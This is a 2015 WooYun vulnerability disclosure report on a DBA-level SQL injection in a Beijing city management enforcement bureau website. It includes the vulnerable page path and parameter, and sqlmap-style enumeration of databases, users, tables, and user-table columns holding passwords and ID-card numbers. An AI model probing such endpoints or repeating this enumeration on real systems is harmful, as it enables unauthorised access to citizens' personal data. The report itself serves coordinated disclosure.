漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0140899
漏洞标题:某市城市管理综合行政执法局某处SQL注入(dba权限)
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-09-16 21:05
修复时间:2015-11-02 15:24
公开时间:2015-11-02 15:24
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:11
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-18: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开
简要描述:
某市城市管理综合行政执法局某处SQL注入,dba权限
详细说明:
北京市城市管理综合行政执法局某处SQL注入,dba权限 泄露该执法局大量重要信息。。。。
有25个数据库。。
URL:http://**.**.**.**/cgsite.pr.prCgImgDetail.do?imgId=250821
available databases [25]:
[*] AYCGXL
[*] BJOM
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
current schema (equivalent to database on Oracle): 'BJOM'
current user: 'BJOM'
current user is DBA: True
31个用户:
database management system users [31]:
[*] ANONYMOUS
[*] AYCGXL
[*] BJOM
[*] CTXSYS
[*] DBSNMP
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
漏洞证明:
有156 表:
Database: BJOM
[156 tables]
+--------------------------+
| AO_ANSWERS |
| AO_DP_ADDRESSES |
| AO_DRAWPRIZES |
| AO_GIFTS |
| AO_GIFT_CATALOG |
| AO_GRADES |
| AO_QUESTIONS |
| AO_SITES |
| AO_SUBJECTS |
| AO_SYSMANAGERS |
| AO_SYS_CODE |
| AO_USERS |
| AO_USER_ANSWERS |
| AO_USER_PLUS |
| AO_USER_POINTS |
| AO_USER_QUESTIONS |
| BL_BLESS |
| BL_BLESS_VOTE |
| BL_KEYWORDS |
| BNBASEDT_T_PARAMCLASS |
| BNBASEDT_T_PARAMNAME |
| BNBASEDT_T_PARAMVALUE |
| BNCOMMON_T_INFORMATION |
| BNDICT_T_BUSINTYPE |
| BNDICT_T_DICTIONARY |
| BNLOG_T_BUSILOGIC |
| BNLOG_T_LOG |
| BNLOG_T_LOGHISTORY |
| BNREPORT_T_REPORT |
| COLLECT_FILE |
| COLLECT_VOTE_INFO |
| COLLECT_WATERMARK |
| COLLECT_WORK |
| COLL_VIDEO_TIMER |
| CONFIGURATION |
| EG_SYSTEM_PARAMETER |
| EMPLOYEE |
| EOSBIZCATALOG |
| EOSBIZCATALOGDEF |
| EOSDATAPRIVILEGEMODEL |
| EOSEJBREGISTER |
| EOSENTITYDEF |
| EOSFIELDDEF |
| EOSFUNCTION |
| EOSFUNCTIONUNIT |
| EOSMENU |
| EOSOPERATOR |
| EOSOPERATORCONFIG |
| EOSOPERATORROLE |
| EOSORG_T_EMPLOYEE |
| EOSORG_T_EMPORGREF |
| EOSORG_T_EMPPOSITION |
| EOSORG_T_ORGANIZATION |
| EOSORG_T_ORGREF |
| EOSORG_T_POSITION |
| EOSORG_T_POSITIONROLE |
| EOSROLE |
| EOSROLECATALOG |
| EOSROLEDATAPRIVILEGE |
| EOSROLEENTITY |
| EOSROLEFIELD |
| EOSROLEGROUP |
| EOSROLEMENU |
| EOSUNIQUETABLE |
| FBFILE_T_FILE |
| IDSUSER |
| KEYWORDS |
| LLK_ALL_CENT |
| LLK_PASS_CENT |
| LOG_INFO |
| PBCATCOL |
| PBCATEDT |
| PBCATFMT |
| PBCATTBL |
| PBCATVLD |
| PIC_AUDIT_ITEM |
| PIC_CATEGORY |
| PIC_CHANNEL |
| PIC_CHANNEL_LINK |
| PIC_CLICKINFO |
| PIC_CLICKTOTAL |
| PIC_COLLECT |
| PIC_COMMENT |
| PIC_CONFIG_HTML |
| PIC_FILE |
| PIC_HOTMOD_LOG |
| PIC_INFO |
| PIC_INFO_WATERMARK_LINK |
| PIC_MEDIAORIMAGE |
| PIC_MEDIAORUSER |
| PIC_MV_EBEIJING_SEARCH |
| PIC_NOTIFY |
| PIC_PERSONAL_HOME_IMAGE |
| PIC_PERSONAL_HOME_PAGE |
| PIC_PHOTOGRAPHER_RANK |
| PIC_SITE |
| PIC_SITE_LINK |
| PIC_SITE_LINK_TYPE |
| PIC_SOURCE |
| PIC_SUBJECT |
| PIC_SUBJECT_DISPLAY_INFO |
| PIC_SUBJECT_LINK |
| PIC_SUGGEST |
| PIC_TEMPLET |
| PIC_TOP |
| PIC_USER |
| PIC_USER_SITE |
| PIC_WATERMARK |
| PLAN_TABLE |
| SCREEN_MENBERS |
| SCREEN_TEAM |
| TBCATEGORY |
| TBCHECKINFO |
| TBCOMMENT |
| TBKEYWORD |
| TBLANGUAGE |
| TBLOG |
| TBMEDIA |
| TBMEDIA$_TEMP1 |
| TBMEDIASUBJECT |
| TBOPERATION |
| TBSOURCE |
| TBSUBJECT |
| TBUSER |
| TEMP1 |
| TMP_AO_ANSWERS |
| TMP_AO_DRAWPRIZES |
| TMP_AO_GIFTS |
| TMP_AO_GIFT_CATALOG |
| TMP_AO_GRADES |
| TMP_AO_QUESTIONS |
| TMP_AO_SITES |
| TMP_AO_SUBJECTS |
| WFACTIVITYINST |
| WFAGENT |
| WFAGENTITEM |
| WFAGENTSCOPE |
| WFAUDITLOG |
| WFPERSONINFO |
| WFPROCESSCONTROL |
| WFPROCESSDEFINE |
| WFPROCESSINST |
| WFPROCESSINSTATTR |
| WFSYSTEMINFO |
| WFTIMER |
| WFTRANSCTRL |
| WFTRANSITION |
| WFWIPARTICIPANT |
| WFWORKITEM |
| WF_H_ACTIVITYINST |
| WF_H_PROCESSINST |
| WF_H_PROCESSINSTATTR |
| WF_H_TRANSCTRL |
| WF_H_TRANSITION |
| WF_H_WIPARTICIPANT |
| WF_H_WORKITEM |
+--------------------------+
Table: TBUSER
[12 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ARTIST | NUMBER |
| BIRTHDAY | DATE |
| CITYNAME | VARCHAR2 |
| HOMEPAGE | VARCHAR2 |
| ID | NUMBER |
| LEV | NUMBER |
| MEDIANUMBER | NUMBER |
| NICKNAME | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| PERSON | NUMBER |
| PORTRAIT | VARCHAR2 |
| USERNAME | VARCHAR2 |
+-------------+----------+
used returns 8065 entries
Database: BJOM
Table: PIC_INFO
[20 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| BAK_FOUR | VARCHAR2 |
| BAK_ONE | VARCHAR2 |
| BAK_THREE | VARCHAR2 |
| BAK_TWO | VARCHAR2 |
| CREATE_DATE | DATE |
| CREATE_USER | NUMBER |
| DESC_ | VARCHAR2 |
| HOT_MOD | NUMBER |
| ID | NUMBER |
| IP_ADDRESS | VARCHAR2 |
| IS_PRIME | NUMBER |
| KEYWORDS | VARCHAR2 |
| OPR_NO | NUMBER |
| PIC_CATEGORY_ID | NUMBER |
| PIC_SITE_ID | NUMBER |
| PIC_SOURCE_ID | NUMBER |
| PUBLISH_DATE | DATE |
| SCREEN_TIME | DATE |
| STATUS | VARCHAR2 |
| TITLE | VARCHAR2 |
+-----------------+----------+
Database: BJOM
Table: AO_USERS
[33 columns]
+--------------+----------+
| Column | Type |
+--------------+----------+
| ADDRESS_ | VARCHAR2 |
| AERA | VARCHAR2 |
| BIRTHEDAY | DATE |
| EMAIL | VARCHAR2 |
| EMAIL_FLAG | VARCHAR2 |
| FAVORITE | VARCHAR2 |
| GIFT_POINTS | NUMBER |
| HOMEPAGE | VARCHAR2 |
| ICON | BLOB |
| ID | NUMBER |
| ID_CARD | VARCHAR2 |
| INTRO | VARCHAR2 |
| IS_VALID | VARCHAR2 |
| LOGIN_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| MSN | VARCHAR2 |
| NICK_NAME | VARCHAR2 |
| PASSWARD | VARCHAR2 |
| PHONE | VARCHAR2 |
| PROFESSION | VARCHAR2 |
| PWANSWER | VARCHAR2 |
| PWQUESTION | VARCHAR2 |
| QQ | VARCHAR2 |
| REG_DATE | DATE |
| REMARK | VARCHAR2 |
| SEX | CHAR |
| SIGN | VARCHAR2 |
| STATUS | VARCHAR2 |
| TITLE | VARCHAR2 |
| TOTAL_POINTS | NUMBER |
| TRUE_NAME | VARCHAR2 |
| UPDAT_DATE | DATE |
| ZIP | VARCHAR2 |
+--------------+----------+
修复方案:
过滤。。。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-09-18 15:22
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置.同时同步抄报给北京市政府信息化主管部门
最新状态:
暂无